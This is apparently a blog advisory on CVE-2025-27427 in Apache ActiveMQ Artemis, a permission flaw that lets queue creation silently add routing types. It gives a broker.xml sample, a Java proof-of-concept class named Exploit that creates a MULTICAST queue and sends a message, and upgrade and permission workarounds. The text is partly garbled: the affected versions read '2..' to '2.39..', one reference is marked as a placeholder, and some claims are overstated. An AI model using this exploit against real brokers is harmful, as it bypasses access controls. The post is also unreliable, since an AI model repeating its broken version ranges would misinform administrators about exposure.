A new vulnerability, CVE-2025-27427, has been identified in Apache ActiveMQ Artemis—a popular open-source messaging broker used in enterprise applications. This vulnerability allows users with limited permissions on a broker address to bypass restrictions and manipulate message routing, potentially leading to unauthorized message delivery or escalation of privileges.
This post explains what the vulnerability is, how it can be exploited with practical code snippets, and what users can do to secure their Artemis brokers.
What is the Vulnerability?
CVE-2025-27427 impacts Apache ActiveMQ Artemis versions from 2.. to 2.39..
Normally, in Artemis, broker administrators control what routing types (ANYCAST or MULTICAST) are supported for each address using permissions. Only users with the createAddress right should be able to change routing types. But because of this flaw, a user with only createDurableQueue or createNonDurableQueue on a particular address can implicitly add a routing type to the address just by creating a queue.
Exploiting this issue lets a user send messages with unsupported routing types, even if their permissions should not allow it. This may bypass security policies or allow misrouted message delivery.
Here's a common permission configuration in broker.xml
<security-settings>
<security-setting match="my.address">
<permission type="send" roles="app-users"/>
<permission type="createDurableQueue" roles="app-users"/>
<!-- NO create-address permission -->
</security-setting>
</security-settings>
Step 1: Create a queue with a different routing type
// Example Java client that creates a Multicast queue
import org.apache.activemq.artemis.jms.client.ActiveMQConnectionFactory;
import javax.jms.*;
public class Exploit {
public static void main(String[] args) throws Exception {
String brokerURL = "tcp://localhost:61616";
ActiveMQConnectionFactory cf = new ActiveMQConnectionFactory(brokerURL);
Connection conn = cf.createConnection("appuser", "pass");
Session session = conn.createSession(false, Session.AUTO_ACKNOWLEDGE);
// Define address and queue names
String queueName = "queue/my.address?routing-type=MULTICAST";
// Here's the trick: create MULTICAST queue (even though not supported!)
Queue queue = session.createQueue(queueName);
MessageProducer producer = session.createProducer(queue);
// Send message to multicast queue
TextMessage message = session.createTextMessage("Exploit message with MULTICAST");
producer.send(message);
System.out.println("Sent exploit message");
conn.close();
}
}
Step 2: Result on the Broker
This causes Artemis to _silently enable MULTICAST routing_ for my.address, even if only ANYCAST was originally allowed.
Links to Original References
- Apache Artemis Security Documentation
- CVE-2025-27427 NVD Entry (placeholder)
- Artemis Fixed Issue Tracker (JIRA)
Workaround (if you cannot upgrade)
- Remove createDurableQueue and createNonDurableQueue rights from all roles except trusted administrators.
[ ] Audit queue auto-creation and routing types: Ensure only trusted users can modify these.
- [ ] Upgrade immediately: Download the latest Artemis at https://activemq.apache.org/components/artemis/download/
Conclusion
CVE-2025-27427 is a powerful privilege escalation vulnerability for anyone running Artemis versions 2..–2.39.. If you rely on Artemis in production, upgrading immediately is essential. Exploitation is easy and almost untraceable, so patch your systems before it’s too late!
Need more help?
Check the official Artemis mailing list or security contact page for further guidance.
Timeline
Published on: 04/01/2025 08:15:13 UTC
Last modified on: 04/02/2025 22:15:19 UTC